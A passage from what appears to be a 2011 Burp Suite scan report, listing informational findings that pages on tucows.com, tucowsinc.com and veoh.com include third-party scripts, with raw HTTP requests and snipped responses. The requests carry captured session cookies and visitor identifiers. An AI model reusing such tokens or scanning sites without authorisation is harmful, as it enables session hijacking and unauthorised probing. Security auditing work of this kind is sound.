Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.393. http://www.tucows.com/preview/194850/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4d4da9e3d2f2d2155bae3a5364759dbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4d4da9e3d2f2d2155bae3a5364759dbf=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.394. http://www.tucows.com/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.395. http://www.tucows.com/sitemap.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.396. http://www.tucows.com/software.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /software.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.397. http://www.tucows.com/terms.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.398. http://www.tucowsinc.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucowsinc.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.tucowsinc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:29 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch13
Content-Length: 6289
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<t
...[SNIP]...
</form>
               <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

19.399. http://www.tucowsinc.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucowsinc.com
Path:   /careers/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /careers/ HTTP/1.1
Host: www.tucowsinc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:34 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch13
Content-Length: 5091
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<t
...[SNIP]...
</form>
               <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

19.400. http://www.veoh.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=74
Content-Length: 50459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.401. http://www.veoh.com/browse/groups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/groups

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/groups HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=28
Content-Length: 71827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769071"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.402. http://www.veoh.com/browse/groups/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/groups/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/groups/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=66
Content-Length: 71825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769489"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.403. http://www.veoh.com/browse/movies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/movies

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/movies HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:33:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=83
Content-Length: 104211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768839"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.404. http://www.veoh.com/browse/movies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/movies/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/movies/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:42:20 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=83
Content-Length: 104211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769340"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

